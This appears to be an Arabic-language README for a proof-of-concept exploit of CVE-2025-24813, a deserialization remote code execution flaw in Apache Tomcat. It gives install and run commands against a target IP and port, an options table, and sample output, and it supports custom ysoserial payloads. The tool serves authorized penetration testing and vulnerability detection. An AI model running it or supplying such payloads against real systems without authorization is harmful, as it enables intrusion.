
استغلال Python لإثبات المفهوم لثغرة CVE-2025-24813 - تنفيذ تعليمات برمجية عن بُعد دون مصادقة في Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) عبر إلغاء تسلسل كائنات Java خبيثة. يتضمن وضع كشف آمن ودعمًا للحمولات المخصصة.
استغلال لإثبات المفهوم لثغرة إلغاء التسلسل في Apache Tomcat (CVE-2025-24813). توضح هذه الأداة كيف يمكن للمهاجمين استغلال إلغاء التسلسل غير الآمن في إدارة جلسات Tomcat.
تحذير: هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها يعد غير قانوني.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
الاستخدام الأساسي:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
خيارات متقدمة:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| الوسيط | الوصف | مطلوب |
|---|---|---|
-t, --target | عنوان IP الخاص بالهدف | نعم |
-p, --port | رقم منفذ الهدف | نعم |
--protocol | http أو https (الافتراضي: http) | لا |
--no-verify | تعطيل التحقق من شهادة SSL | لا |
--timeout | مهلة الطلب بالثواني (الافتراضي: 10) | لا |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
للفحص الشامل للأنظمة المعرضة للخطر:
🔍 CVE-2025-24813-Scanner - أداة اكتشاف شامل لمضيفي Tomcat المعرضين للخطر
إذا كنت متأثرًا بهذه الثغرة:
يُقدَّم هذا البرنامج بموجب رخصة MIT. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. احصل دائمًا على إذن مناسب قبل اختبار الأنظمة.
رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.